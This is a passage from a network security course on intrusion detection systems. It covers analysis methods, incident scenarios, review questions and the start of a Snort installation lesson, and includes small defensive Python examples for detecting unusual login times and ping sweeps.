6. A response to the alert is created. The response used by the console has been
programmed by the security team for this type of intrusion event.
7. The alert is archived for later analysis, and a report of the incident is
created.
8. Long-term analysis is used to determine if this is part of a bigger intrusion.
Figure 7-10: Distributed network-based IDS example.
TASK 7D-1
Discussing Sensor Placement
1. Is the location of the sensor the determining factor in deciding if the
IDS is host-based or network-based? Explain your response.
No. If the IDS is running on each computer and those computers are analyz-
ing intrusion attempts on the operating system, then it is host-based. If the
IDS is running on each computer and those computers are analyzing the
packets with the Ethernet device, then it is network-based.
2. Describe the process of a traditional network-based IDS.
1. A network packet is sent from one host to another in the network (this
can include a packet from the Internet to a firewall).
2. The packet is pulled off the network in real time by the network sensor,
generally positioned between the two communicating hosts.
3. The packet is processed in real time in the detection engine, and is ana-
lyzed for known signatures.
4. If a signature match is detected, an alert is created and forwarded to
the command console.
5. The security professional is notied of the alert.
6. A response to the alert is created. The response used by the console has
been programmed by the security team for this type of intrusion event.
7. The alert is archived for later analysis, and a report of the incident is
created.
8. Long-term analysis is used to determine if this is part of a bigger
intrusion.
Topic 7E
The Analysis
In the previous topic, you examined the processes of the different types of IDS
implementation. One common point in all of them was the analysis of data once
it has been collected. In this topic, you will look into the analysis process itself.
When to Analyze
After the agents, or sensors, have been set in place, the timing of analysis must
be dened. While this might be part of the architecture chosen, it is worth noting
the options and their strong and weak points.
Interval Analysis
This method of analysis uses the internal operating system (or other host-based)
audit logs to capture the events, and the IDS, at given intervals, analyzes the data
in the logs for signatures of intrusion.
Using this method of analysis is effective in organizations where the perceived
threat is low and the potential loss from a single attack is high, such as a very
well guarded server that holds the organization's most secret data. Those running
this type of analysis are more concerned with the data collected and accuracy
than speed. The data collected in this case is often, if secured properly, used in
legal proceedings during criminal prosecution.
Another strong point of interval analysis is that there is less of a burden placed
on the individual hosts to perform the analysis, since it is not in real time. And,
this type of analysis is a benefit to organizations that are not large enough to have
a full-time employee or consultant watching for intrusion signatures.
On the other hand, there are weaknesses to this type of analysis. An incident is
usually not identified until after it has occurred, which presents obvious problems.
Because the analysis is in intervals, the ability to notice and respond to an
incident quickly, or as it is happening, is close to nonexistent. Additionally, if the
hosts that are running the analysis do not have sufficient disk space to hold the
events between intervals, problems can occur.
Real-time Analysis
As an alternative to interval analysis, there is real-time analysis. This involves, as
the name implies, data being analyzed for signatures as it is collected.
Real-time analysis runs continuously: collecting, analyzing, reporting, and
responding (if programmed to do so). Do not misunderstand the term real-time to
mean same-time. An event cannot be countered the exact moment it happens.
However, the concept behind real time is that an attack should be dealt with
as it is happening, and if the system knows the signature, the attack should be
stopped before it can complete and compromise a host.
This type of analysis has the ability to respond in real time, via the methods
previously discussed (email, pages, and even telephone calls). The real-time nature
of this analysis means that security professionals can respond while an attack is
underway, and stop it. An additional benefit to real-time analysis is that hosts can
be recovered quickly in the event of a compromise, because there is no need to
wait for the analysis to find out what has been compromised.
However, just as there are benets, there are weaknesses to this type of analysis.
One of the more critical weaknesses might be the extra resources used by the
hosts. More memory and processing will be required.
Because the systems can be programmed to provide an automated response, this
must be planned carefully. Unless you can guarantee the system will analyze the
data correctly, and respond as expected, the automatic response needs to be con-
sidered cautiously. A response of disconnecting a distribution partner over the
Internet due to an error in analysis could be very costly.
How to Analyze
You have discussed the methods of when to have the IDS analyze data, but it is
just as critical to determine how the analysis is going to happen. Again, this
might be part of the architecture of the design, but the individual points must be
described.
Signature Analysis
The common element that most IDS products have in common is signature
analysis. The signature is a known event or pattern of events that correspond to
acknowledged or known attacks. These signatures can be very simple to detect,
like a ood of ICMP requests to a given server, or much more subtle, like a
failed login request on a server three times in a week from an external source.
Signature analysis is the process of matching the known attacks against the data
collected in the network. If there is a match, then that is a trigger for an intru-
sion, and an alarm might be the result.
Most commercial IDS vendors have a list of known signatures, much like the
antivirus industry. The big difference is that the majority of the antivirus
companies have lists of over 20,000 known signatures for viruses and Trojan horses,
and these companies can react very quickly and have the signatures uploaded to
websites for users to download.
By way of comparison, an IDS might have only a few hundred signatures to use.
The users of the IDS are then left to download further signatures when they are
available, or analyze the data and create their own signatures.
An Example Signature
Although the signatures that an IDS uses can be complex, you can use parts of a
signature to illustrate how the analysis works. Suppose that the data displayed in
Figure 7-11 is collected by the IDS.
Figure 7-11: An example of data collected by an IDS.
If this signature was not in the database of known signatures to the IDS, the
security professional running the IDS should still be able to identify the attack.
Let's perform a brief analysis of this data. You can identify that the source
address is 172.168.30.23. You would check the IP address to see if there is any
historical data regarding it. The IDs are sequential, corresponding to the time of
the event. This indicates a very fast event, as all IDs are less than one second
apart (the event starts at 8:52:52 and ends at 8:52:53). The destination port
tells us the source is running a scan to see what hosts have a telnet server
running. The scan covers the entire network of IP addresses, 1 through 254.
Our brief analysis of this event, then, is: At 8:52:52, the network 192.168.10.0/24
was scanned to see which computers were running telnet servers. The scan
concluded at 8:52:53. The likelihood that the source IP address was spoofed is low,
because the attacker would need the scan to return data on hosts running telnet.
Because none of the computers scanned run telnet, the risk from this event,
individually, is low. There is no historical data to indicate previous activity from
this source IP address. However, it is now recorded that there is intrusion activity
from 172.168.30.23, and future attempts will correlate with this data.
The previous example illustrates the process of analyzing signatures. The IDS can
only detect the signatures it is aware of; other activity will need to be identied
by the professionals using the system.
Statistical Analysis
A common scientic method, not often implemented in commercial IDS products,
but worth discussing, is statistical analysis. The basic concept of statistical analy-
sis is to nd a deviation from a known pattern of behavior. Using this method, an
IDS would create proles of user behavior. Examples of the types of behavior
might include login times, amount of time on the network, and the amount of
bandwidth used.
This data is then described as the normal usage of this profile. When an event
happens that is not in the normal usage pattern, a possible intrusion is the result.
The usual example of this would be login times. If a user has consistently
logged in only between 8:30 A.M. and 6:30 P.M. for the last year, and that account
tries to log in at 2:00 A.M., a possible intrusion is happening, and an alert would
be issued.
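The login-time profile just described, as an added example (Python written for this edition, not part of the course text or any IDS product): a year of constructed login records is reduced to a count of logins per hour of day for each user, and a new login is flagged when its hour accounts for less than a chosen fraction of that user's history. The users alice, bob and mallory, the timestamps, and the one percent threshold are assumptions made for the example.

```python
"""Login-time profiling for anomaly detection.

Added example, not from the course text: builds a per-user profile of the
hour of day at which logins normally occur from a constructed history, then
scores new logins against that profile. Users, timestamps and the threshold
are assumptions made for this example.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def _history():
    """Constructed year of login records: alice works daytime hours,
    bob works a night shift. Returns a list of (user, timestamp)."""
    events = []
    first_day = datetime(2023, 1, 2)
    for n in range(365):
        day = first_day + timedelta(days=n)
        if day.weekday() >= 5:          # no logins at weekends
            continue
        events.append(("alice", day.replace(hour=8 + n % 10, minute=30)))
        events.append(("bob", day.replace(hour=(22 + n % 8) % 24, minute=5)))
    return events


HISTORY = _history()


def build_profiles(history):
    """Return {user: Counter(hour_of_day -> number of logins)}."""
    profiles = defaultdict(Counter)
    for user, ts in history:
        profiles[user][ts.hour] += 1
    return profiles


PROFILES = build_profiles(HISTORY)


def score_login(profiles, user, ts, min_fraction=0.01):
    """Classify one login as 'normal', 'anomalous' or 'unknown user'.

    The login is anomalous when fewer than min_fraction of the user's
    historical logins fall in the same hour of day (including none at all).
    """
    profile = profiles.get(user)
    if not profile:
        return "unknown user"
    total = sum(profile.values())
    if profile[ts.hour] / total < min_fraction:
        return "anomalous"
    return "normal"


def flag_logins(profiles, new_events):
    """Return the (user, timestamp, verdict) triples that are not normal."""
    flagged = []
    for user, ts in new_events:
        verdict = score_login(profiles, user, ts)
        if verdict != "normal":
            flagged.append((user, ts, verdict))
    return flagged


# Constructed new logins to score: a normal daytime login for alice, the
# 2:00 A.M. login from the text, bob's usual night-shift login, and an
# account with no history at all.
NEW_LOGINS = [
    ("alice", datetime(2024, 1, 16, 9, 15)),
    ("alice", datetime(2024, 1, 17, 2, 0)),
    ("bob", datetime(2024, 1, 17, 2, 5)),
    ("mallory", datetime(2024, 1, 17, 3, 0)),
]

if __name__ == "__main__":
    for user, ts, verdict in flag_logins(PROFILES, NEW_LOGINS):
        print(f"{ts:%Y-%m-%d %H:%M} {user}: {verdict}")
```

The point of keeping the profile per user is visible in the sample: the same 2:00 A.M. hour is anomalous for alice and normal for bob, so a single network-wide rule would produce either a false-positive for the night shift or a false-negative for the daytime account. The fraction threshold, rather than a simple never-seen test, lets the occasional late-night login in the baseline be treated as noise instead of becoming part of the profile.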
TASK 7E-1
Discussing Data Analysis
1. Which type of data analysis is often used as the method of analysis for
legal proceedings involving IDSs?
Interval analysis.
Topic 7F
How to Use an IDS
In this topic, you will be introduced to the different methodologies of intrusion
detection. While there are no methods set in stone, this topic attempts to outline
several examples for you to use in the future. These detailed intrusion examples
include DoS, network sweeps, and internal misuse of resources.
Detection of Outside Threats
One of the issues of ever-increasing trouble for networks is Denial of Service
attacks. When attackers choose to block service without attempting network pen-
etration, it can be a difficult problem to solve.
Imagine the following scenario:
It is 4:40 P.M. on Friday. You are about to go home and enjoy the weekend. You
hear your incoming mail sound, and look at the new message. Incoming ICMP
packets, lots of them. You are not going home after all.
You begin your investigation. It seems the ICMP packets have been detected as a
Denial of Service attack. You have seen this before, and are familiar with the
signs.
As you investigate further, you realize it is more than a simple ping attack. It
seems to be a Distributed Denial of Service. The IDS is alarming with signs of
attack from 101 distinct IP addresses.
You continue to dig as you read the log files, and it turns out that although there
are 101 addresses listed, they all register to the same local ISP. By now, you're
thinking, I hope Saturday afternoon will be nice.
The pings pause for a minute. Unusual, you think. It is almost like the attacker
did not enter enough packets to maintain the high DDoS attack. About 10 min-
utes later, it starts again. You have been on the phone this entire time with your
ISP trying to get them to block ICMP requests.
profile: Patterns of a user's activity which can detect changes in normal routines.
penetration: The successful unauthorized access to an automated system.
Back to the log files, where you see the attacks coming from the same group of
nodes. The attacker must have re-entered the script, perhaps this time with a
higher count. Now, your ISP is noticing, and they indicate they will open a ticket
to investigate.
Back to the log files, where further investigation confirms the IP addresses used
are all in the same block from the same local ISP. You get on the phone to the
local ISP. They are helpful and willing to work with you to locate the offending
IP addresses. They confirm that those addresses are all in their range.
Since the local ISP is only a few miles away, and the IP addresses in question are
all local, you are thinking the attacker must have targeted your network on
purpose, and you are not the victim of a random DDoS. On the other hand, your
organization has not lost a verifiable amount of money over the attack so far, so
FBI involvement will probably not be needed.
The local ISP administrator is helpful and works with you on helping to locate a
source. The pings stop again. Even though they went longer this time, they still
stopped. Again, there is a pause in the action for a while, and it picks up again.
Back to the log files. Again, you find 101 addresses in the attack. The local ISP
administrator calls to tell you there is no new news yet. Late into the night, you
decide to leave and come back in the morning.
Returning in the morning, you turn to the log files. The log files indicate that the
attacks continued throughout the night, 101 addresses every time, yet each attack
running only for 10 minutes.
You dump the logs into a database for analysis, and you decide to see which
addresses were involved in each attack. This turns out to be the break you were
looking for.
In the data logs, it turns out that only three IP addresses were involved in every
attack. Working with the local ISP, you identify that two of the addresses are
dial-up accounts and rarely on. The third is a DSL user who is always connected.
You suspect this user is the culprit. Although the local ISP will not reveal the
identity of the user to you, they have helped you as much as you could hope for.
Now, you are onto internal research.
You begin by combing through the current employee list and checking for home
email addresses. The company is not all that large, so it is an easy task. You view
the list from top to bottom and find nothing.
Next, you decide to go through the list of past employees, starting with people
who were let go or who resigned in the last six months. This is a much smaller
list, only 17 names.
There it is, in black and white. There is one ex-employee who was fired only a
month ago. The home email address does indeed come from the same local ISP.
You pull out a saved email from the archive and check the headers. Sure enough,
the IP address matches. You are hot on the trail of the attacker and have enough
evidence to go to the next level.
Now, imagine this scenario without the IDS running. What would the situation be?
The network would seem slower, but it would take time to isolate where it is
slowing down. Without the IDS, you would not have the head start, you would not
have logging of the IP addresses, and you would have a hard time not only
tracking down the cause, but also deciding on a response and solution.
Detection of Inside Threats
Let's now look at an example of how an IDS can work to detect inside threats. This
is one of the difficult areas of security. Because these users already have some
level of access to the network, dealing with inside threats can be more complex
than dealing with outside threats.
A reason that this is a difficult area of security is the term threat. In this case, a
threat is not always someone stealing data; more often it is the inappropriate use
of company resources. So, for this example, you will look at a user who is misusing
resources, not attempting data theft.
At 11:30 A.M. on a Tuesday, you are notified that two of the color laser printers
are running out of toner every Monday. Because the company has laser printers
all over the office and only a few people are granted permission to each printer,
this is unusual. It should be several months before the printers need refilling.
However, every Monday two of them are nearly out and end up getting refilled.
You are investigating to find out the culprit, but cannot find anything right away.
You add the IP addresses of the laser printers to the IDS to track who is sending
what to the printers, and when.
Every night, you check the logs and find nothing out of the ordinary. By Friday
night, you are wondering if perhaps the printer is malfunctioning. You remotely
connect to the network over the weekend and check the logs on Saturday night.
Still, you find nothing.
Sunday night, around 11:30 P.M., you remotely connect into the network again to
check the logs. Again, there is nothing to report as unusual. You go to bed, won-
dering what the situation will be like in the morning.
When you get to work on Monday, you are pulled into a meeting that lasts until
1:00 P.M. When you finally get out of the meeting, you see a note on your
monitor that states, Yes, we just had to replace the toner again. What did you find?
You get on the network and head right to the log files. Finally, there it is. There
is an enormous print job sent at 7:00 A.M. It took over two hours to finish
printing. You quickly identify the IP address and host name of the computer that
sent the data.
You inform the network administrators of what you found, and the two of you take a walk. When you get to the cube of the worker who used that computer, you can see the evidence quite clearly.
All over the walls are glossy printed photographs; they are 11x17 full-color photographs. Stacks of 11x17 photos are on the desk.
After a conversation, you find out that this employee has taken up digital photography as a new hobby. And, every weekend this employee shoots hundreds of pictures, only to come in to work first thing in the morning and print out as many as possible. ("Until the colors are not as crisp and bright on the printout, and then I stop," you are told.)
This is a classic example of resource misuse, which can be identified with the IDS in place. Without the IDS, this task is much more complex, and perhaps someone would be asked to physically watch the printer for use in this fashion.
396 Tactical Perimeter Defense
Anticipation of Attack Monitoring
One of the standard attack sequences for hackers just starting out is the ping
sweep for live hosts. Not complex, or difficult, but worth noting in any event.
The ping sweep simply pings a given range of IP addresses. The nodes that
respond are active, and might be potential targets.
Virtually all IDS systems will pick up and notify on ping sweeps. This type of
traffic can lead to nothing, or it could be the early attempt to map the network for
further attacks. The IDS will recognize the signature of sequential ping packets in
rapid succession, and an alarm will sound.
By recognizing a ping sweep, the organization can decide on its proper response. Perhaps it responds with a message to the ISP that holds the IP address, or perhaps it simply monitors for further traffic from that IP address. In any case, the ability to choose a course of action exists due to the presence and function of the IDS.
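The "sequential pings in rapid succession" signature described above, as an added example that is not from the book: each echo request the sensor saw is a constructed (seconds, source, destination) record, and the window and target-count thresholds are assumptions chosen for the example.

```python
"""Distinguish a ping sweep (one source, many destinations, short span) from a normal ping."""
from collections import defaultdict, deque

# Constructed echo-request records: 10.0.10.115 pings 10.0.10.213 normally (4 packets, 1 s apart),
# while 192.0.2.7 walks 10.0.10.1 through 10.0.10.12 in 0.1 s steps.
ECHO_REQUESTS = [(float(i), "10.0.10.115", "10.0.10.213") for i in range(4)] + \
                [(5.0 + 0.1 * n, "192.0.2.7", f"10.0.10.{n + 1}") for n in range(12)]


def detect_ping_sweeps(requests, window_s=2.0, min_targets=8):
    """Return {src: distinct_targets} for every source that reached at least min_targets
    distinct destinations inside some window_s-second span. Records are sorted by time."""
    per_src = defaultdict(deque)      # src -> (time, dst) records still inside the window
    alerts = {}
    for t, src, dst in sorted(requests):
        q = per_src[src]
        q.append((t, dst))
        while q and t - q[0][0] > window_s:     # slide the window forward
            q.popleft()
        distinct = {d for _, d in q}
        if len(distinct) >= min_targets:
            alerts[src] = max(alerts.get(src, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for src, n in detect_ping_sweeps(ECHO_REQUESTS).items():
        print(f"ALERT: {src} probed {n} distinct hosts within 2 s (ping sweep)")
```

A normal ping repeats to one destination and never trips the rule; a sweep spread out over much longer than the window is not caught by this rule either, which is why the window and count are tuning decisions for the organization rather than fixed values.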
Surveillance Monitoring
When there has been some indication of either a threat of a break-in, resource misuse, or some other unauthorized activity, the IDS can be used in a mode of surveillance. At first glance, this might seem to be the entire function of the IDS in the first place. However, in this particular area, the reference is to more of an increased level of awareness. Beyond the normal day-to-day monitoring that happens, this is when a threat has been identified.
Take the following situation as an example: A company has had the same senior-level network administrator for five years. Recently, this administrator was found to be working part-time for another company. Because this person was at a senior level and had an exclusive contract, he had to be let go.
The release was not a pleasant one, but no threats or poor language were used towards either party. This situation would, however, be cause to put the IDS into a surveillance mode, with the specific goal being to monitor traffic that could be coming from the released employee.
The task of detecting an ex-employee can be difficult (even more so if it is a
technical person) because this person is aware of the internals of the network.
Nonetheless, this situation would require an IDS on a higher alert.
TASK 7F-1
Discussing Intrusion Detection Uses
1. Describe how an IDS can be used to detect an outside threat.
Answers will vary, but may include: To identify attack signatures that are
originating from IP addresses other than your internal private range.
Lesson 7: Designing an Intrusion Detection System 397
Topic 7G
What an IDS Cannot Do
Throughout this lesson, you have identified and discussed the abilities of IDSs. As good as they are, and as helpful to the security of the network as they are, they do have limitations. An IDS can only do what it is designed to do; do not expect more from it. In this topic, you will examine some of the things an IDS cannot do.
Provide the Magic Solution
Although some IDS vendors might try to convince you of this, an IDS is not a magic solution. It does not have the ability to bring the security of your network to perfection. An IDS cannot, and should not, be expected to suddenly notice every single event that you might consider to be an intrusion or misuse. It can perform only as it is programmed. If a new type of intrusion is created today, the IDS cannot magically be configured to know this signature by this afternoon.
Relying on the IDS to an extreme can create security professionals who become complacent and miss new or unusual intrusions when they occur. Your skill and knowledge as a security professional must remain at the highest level, regardless of the equipment in the organization.
Manage Hardware Failures
This might seem like an obvious point, but let's define it a bit further. If a new attack comes into your network, suddenly hits your 1,000 Linux workstations (all nodes), and they all crash, there are no nodes available to inform the IDS of an intrusion.
Yes, the IDS (if on a different platform) might still be on, and you might get a page that states, "All of your Linux computers are gone," but you cannot expect the IDS to manage any of those failures. The IDS might inform you that the event happened, but don't expect more.
Investigate an Attack
There are options for what an IDS can do to respond to an attack. But responding is not the same as investigating. An IDS cannot notice a SYN flood coming from a single IP address and then follow up on it by itself. The IDS will inform you of the SYN flood, and it will be up to you to follow up.
The IDS will provide the data for the investigation, but do not expect the IDS to perform any of the investigation itself. Although, if that day ever comes, there will be some interesting ramifications of it. Imagine your IDS paging you to state, "You had a SYN flood at 2 A.M. I traced the IP address, sent a message to their ISP, and had the attacker arrested. Have a nice day!"
crash: A sudden, usually drastic failure of a computer system.
SYN flood: When the SYN queue is flooded, no new connection can be opened.
100 Percent Analysis
Once the data has been collected by the IDS, then some serious investigation
must happen. There must be a way of analyzing all the collected data. Because
most organizations do not have a full-time (24 hours a day, 7 days a week)
human monitoring the IDS statistics, analysis of the data is required.
To expect the IDS to perform a perfect 100 percent analysis on the data is unrealistic, as the amount of data would be too high. The computers running the analysis would not be able to keep up with that high volume of traffic. To say to the IDS, "Here is all the data collected in the last week, tell me everything that happened," and think you can then sit back and watch for the results of the analysis is also unrealistic.
TASK 7G-1
Discussing Incident Investigation
1. Describe why an IDS cannot investigate an intrusion attempt.
The IDS is able to identify an attack, even in real time; however, it cannot investigate the attack. It might be able to respond, by closing ports, or paging the security professional. There is no mechanism in modern IDS systems for tracking down IP addresses, contacting the correct ISP, or explaining an intrusion attempt to the FBI.
Summary
In this lesson, you were introduced to the concepts and technologies of IDSs. You examined the differences between using host-based and network-based IDSs, and how each of them can be implemented. You examined the types of data analysis. You identified multiple scenarios of an IDS in use, and how each one presents a different situation to the IDS. Finally, you examined the situations an IDS cannot help with, and the tasks an IDS cannot perform.
Lesson Review
7A What are the major components of an IDS?
Prevention, detection, and response.
What is one reason you need to be careful with the response of the IDS?
You have to exercise caution in determining the level of response to incidents, since aggressive or offensive responses may open up the organization to serious legal issues.
What's worse: a false-negative or a true-positive?
A false-negative, as it signifies that an alarm was not generated when a condition should have been alerted.
7B Describe how an Ethernet host, running in promiscuous mode as an IDS, sniffs packets off the local segment.
1. A host creates a network packet. So far, nothing is known other than that a packet exists that was sent from a host in the network.
2. The IDS host reads the packet in real time off the network segment.
3. The detection program in the sensor matches the packet with known signatures of misuse. When a signature is detected, an alert is generated and sent to the command console.
4. The command console receives the alert and notifies the designated person or group of the detection.
5. The response is created in accordance with the programmed response for this matching signature.
6. The alert is logged for future reference.
7. A summary report is created.
8. The alert is viewed with other historical data to determine if there is a pattern of misuse or to indicate a slow attack.
7C Describe the general process of host-based IDS.
Host-based IDS uses what are known as agents (also called sensors), which
are small programs running on the hosts that are programmed to detect
intrusions upon the host. They communicate with the command console.
What are the different designs of host-based IDS?
Centralized and distributed.
Describe the advantages and disadvantages of each design of host-based IDS.
In the centralized design, the data is gathered and sent from the host to a centralized location. There is no significant performance drop on the hosts because the agents simply gather information and send it elsewhere for analysis. However, due to the nature of the design, there is no possibility of real-time detection and response.
In the distributed design, the agents on the hosts are the ones that perform the analysis. There is a significant advantage to this method: the intrusion data can be monitored in real time. The flip side is that the hosts themselves can experience a bit of a performance drop, as each computer is engaged in this work constantly.
7D Describe the general process of network-based IDS.
In network-based IDS, sensors are installed in key positions throughout the
network, and they all report to the command console. The sensors are full
detection engines that have the ability to sniff network packets, analyze for
known signatures, and notify the console with an alert if an intrusion is
detected.
What are the differences between host-based and network-based IDS?
Host-based IDS is designed to detect intrusions on a host, whether the attempt to intrude comes through a network interface or the keyboard. Network-based IDS is designed to detect intrusions in a network by analyzing network traffic, regardless of any specific host.
What are the different designs of network-based IDS?
Traditional and distributed.
Describe the advantages of each design of network-based IDS.
In the traditional design of network-based IDS, sensors are used in the network, where a sensor is a host that is configured to run the IDS software. This is usually a stand-alone computer. Each sensor runs in promiscuous mode. Packets are then fed directly into the detection engine for analysis. In general, there should be one sensor in each critical segment of the network. Any alarms that are generated are sent to the command console.
In the distributed design of network-based IDS, a sensor is installed on each host in the network, instead of on each segment of the network. The sensors then communicate with each other in the event of an intrusion, and use the command console as a center of operations and for alarms. This provides the opportunity to detect packets that might otherwise have been lost or missed by the traditional design IDS.
7E What is the difference between interval and real-time analysis?
In interval analysis, the operating system (or other host-based) audit logs
are used to capture the events, and the IDS, at given intervals, analyzes the
data in the logs for signatures of intrusion. With real-time analysis, data is
analyzed for intrusion signatures as it is collected.
What is the difference between statistical and signature analysis?
In signature analysis, known attack signatures are compared against data collected in the network. A match results in a trigger for an intrusion, and an alarm might follow. Statistical analysis attempts to find deviations from known patterns of behavior. Using this method, an IDS would create profiles of user behavior. This data is then described as the normal usage for this profile. When an event happens that deviates from the normal usage pattern, it could mean a possible intrusion.
7F Describe the process of detecting internal misuse.
Most internal threats are network or resource misuse. This is one of the difficult areas of security. Since the users already have some level of access to the network, dealing with inside threats can be quite a bit more complex than outside threats. A reason that this is a difficult area of security is that the threat does not always result in someone stealing data; more often it is the inappropriate use of company resources. Detecting internal misuse might require auditing of network resources such as file and print servers, and so on.
Describe the difference between surveillance and normal IDS operation.
When there has been some indication of either a threat of break-in, resource misuse, or some other unauthorized activity, the IDS can be used in surveillance mode. While this might seem to be the entire function of the IDS in the first place, the reference is to more of an increased level of awareness versus the normal mode of operation.
7G What is the reason an IDS cannot manage hardware failures?
The IDS might be able only to inform you that an event happened. If the
response is not programmed to thwart the attack and if the attack results in
the shutting down of the system running the IDS, then obviously future
attacks cannot be analyzed as well.
What is the reason an IDS cannot provide 100 percent analysis?
While it might be mathematically possible to gather 100 percent of the network traffic and 100 percent of host-based activity, it is unrealistic to expect the computer to process all of it.
Configuring an IDS
Overview
In this lesson, you will implement an IDS. There are many different types of IDSes, and for this lesson, you will use perhaps the most famous free IDS tool: Snort. Snort is a tool that is designed to monitor TCP/IP networks, looking for suspicious traffic and direct network attacks. It enables system administrators to collect enough data to make informed decisions on the best course of action in the event that an intrusion is detected.
Objectives
To configure IDSs, you will:
8A Describe how Snort works as an IDS.
You will describe how Snort works as an IDS, including the pros and cons of implementation in a production network environment.
8B Install Snort on a stand-alone computer.
Given a computer running Windows in a networked environment, you will install the Snort intrusion detection application.
8C Describe the rules used in Snort.
On a computer running Snort, you will create and test a ruleset to check the effectiveness of the installation.
8D Configure Snort IDS to use a MySQL database.
Given a computer running Windows, you will install MySQL and configure Snort to send alert data to the database.
8E Configure a full IDS on Linux.
Given a computer running SuSe Linux, you will configure Snort, MySQL, and the BASE Console to view alerts.
Data Files
Snort_2_6_1_2_Installer
Rules directory
mysql-essential-5.0.27-win32
adodb493a.tgz
base-1.2.7.tar.gz
Lesson Time: 6 hours
Lesson 8: Configuring an IDS 403
Topic 8A
Snort Foundations
In the world of intrusion detection tools, administrators and analysts have many
choices. One of the choices is cost. Another critical choice is speed of response to
new types of incidents, such as Code Red and the quick follow-up of Code Red
II. It is in this conversation that an open-source tool such as Snort really shines.
This tool and the associated applications that go along with it can be found at
www.snort.org.
The cost issue should be obvious to everyone, and free can't be beat! When commercial IDS products can be a few thousand dollars on the low end and over a hundred thousand dollars towards the high end, free is clearly a driving force for some.
The other primary benefit is the fact that the open-source format allows for fast modifications. The rules that Snort uses to make decisions can be made by anyone and then posted to the web. If a new threat is identified in the morning, an administrator can create a new rule and post it by that afternoon. The Snort community can then analyze the rule, and when it is determined to be correct, the rule can be downloaded and implemented. A threat can be minimized the very day it is announced. This is a significant benefit.
Snort Deployment
Snort can be deployed on just about any host on the network. The actual Snort program is very small and does not use enough resources to cause any significant issues with the base operating system. It is possible to install and configure Snort and let it run for days with no intervention from the administrator. At a later date, the administrator can view and analyze the data collected.
Although Snort can be installed on almost any host in the network, the choice of placement is important. Snort uses an interface in promiscuous mode (meaning that it captures all the packets seen by the NIC), and one installation of Snort per collision domain might be sufficient. It can also be a benefit to have an IDS placed just inside and just outside of the firewall. This way, you can identify the attacks that are blocked by the firewall, not just the internal threats.
The interface that is in promiscuous mode is acting as a sniffer, capturing all the
network traffic that the NIC sees. If your network is switched, make sure that you
have at least one host running Snort on each segment. The host itself need not be
an overly powerful machine; however, it is advisable that sufficient disk space be
available to store data and that the processor be able to keep up with analysis of
the packets.
How Snort Works
Snort functions as a network sniffer and logger that can be implemented as a network-based IDS. (Snort is not a host-based IDS.) Snort uses crafted rules, which are matched against the packets as they are captured. If a rule matches, the user-defined action in the rule is executed.
sniffer: A program to capture data across a computer network. Used by hackers to capture user ID names and passwords. A software tool that audits and identifies network traffic packets. It is also used legitimately by network operations and maintenance personnel to troubleshoot network problems.
What the rules can check for is limited only by the administrator's imagination and by the fact that Snort can only identify TCP, UDP, IP, and ICMP. There is currently no support for routing protocols.
The types of rules that can be created are therefore quite varied. Examples are buffer overflows, port scanning, network mapping, SMB probes, NetBIOS scans, and so on.
The way that Snort is able to use such flexible rules is due to the way Snort functions. Snort can look inside a packet and examine its contents. Snort is not limited to an examination of headers only. This function is called payload inspection. It is due to this payload inspection that Snort can achieve such flexible rules.
Snort Fundamentals
Snort has four main pieces that combine to provide you with solid IDS functionality. The first is the actual packet capture piece, utilizing LibPcap or WinPcap, where raw packets are pulled off the wire. The second is the preprocessor, where packets are examined prior to handoff to the actual detection engine. The third is the actual detection engine. This is where your Snort rules are in action, with the detection engine looking at the parts of the packets as you have defined. Last is the output piece. If the packet is run through the detection engine and an alert is generated, or if logging is defined, the output piece is where that takes place.
The main file that contains the core Snort configuration is called snort.conf. This file has several primary parts, some of which you will not make any adjustments to in this course. Note: If you wish to go into great depth with Snort, you are recommended to start with the official documentation found at www.snort.org.
The primary parts of the snort.conf file are:
Variables
Preprocessors
Output Plug-ins
Rulesets
There are many variables used in Snort, which can then be referenced later. Some common variables are var HOME_NET, which is used to define your local network, and var EXTERNAL_NET, which is used to define your external network.
Preprocessors are filters used by Snort to perform actions on a packet prior to the full Snort engine. This is useful for speeding up Snort, when preprocessing can exclude a packet before Snort rules are required to look inside the payload to perform content and other matching.
Output plug-ins are used by Snort to determine alerting and logging features and
what format to use when Snort is going to dump collected data.
You will define the location of the rulesets that you wish to use in the snort.conf file. Although you could write rules into this file, that practice is not encouraged. By writing individual rule files, you are able to maintain better control over your configuration. You define the location of the ruleset in the snort.conf file, and then the individual rules you require are located in that separate ruleset file.
Prior to running tasks on Snort, you will need to perform some initial configuration. The first thing to alter is called the Home Network. This line tells Snort what your network's IP configuration is, so that Snort will only sniff traffic on your network, versus all traffic. If you wish to sniff all traffic, you may use a home network of any.
In this classroom, there are two student networks; the LEFT side uses the 172.16.10.0/24 network and the RIGHT side uses the 172.18.10.0/24 network. If your system is part of the LEFT network, you will configure Snort to use this line: var HOME_NET 172.16.10.0/24. If your system is part of the RIGHT network, you will configure Snort to use this line: var HOME_NET 172.18.10.0/24.
Snort runs on both Linux and Windows platforms, and for this lesson, the tasks are run on a Windows system. There are other Snort configuration lines that require editing because you are running on a Windows system. Two of these other lines are:
include classification.config
include reference.config
These need to be changed to define the full Snort path on your system. You will need to change these lines to read as follows:
include C:\Snort\etc\classification.config
include C:\Snort\etc\reference.config
Topic 8B
Snort Installation
Another benefit of Snort might be its ease of installation. The overall process of installation takes only a few minutes. A few more minutes of configuration, and Snort is up and running.
In this section, you will be installing Snort on a Windows computer, and then
later in the lesson, you will perform a full installation on SuSe Linux. You will
require two things for the installation on Windows:
LibPcap for Windows. You will use a packet capture driver called WinPcap for this function. (Further WinPcap information is available from the Computer Network and Network Intelligence Group of Politecnico di Torino.) This simple, self-extracting executable file can be found at www.snort.org or in other Internet archives.
The Snort application file itself. This is an executable file that can also be found at www.snort.org.
For tips on loading Snort on Windows machines, visit www.silicondefense.com.
TASK 8B-1
Installing Snort
1. If required (you should have installed WinPcap earlier in the course), run the WinPcap installation file to install the Windows version of the LibPcap driver. Note that the filename is WinPcap_4_0.exe.
2. From the C:\Tools\Lesson8 folder, double-click the Snort installer file. The full filename is Snort_2_6_1_2_Installer.exe.
3. Read the License Agreement, and if you agree, click the I Agree button
to continue the installation.
4. Keep the I Do Not Plan To Log To A Database radio button selected and
click Next. Note that later in the lesson you will work with a MySQL
database.
5. Keep all the default selected components checked, and click Next.
6. Accept the default install location, and click Next.
7. When the install is complete, click Close to exit the Setup program.
8. In the successful install window, click OK. If you get a pop-up about
WinPcap, click OK.
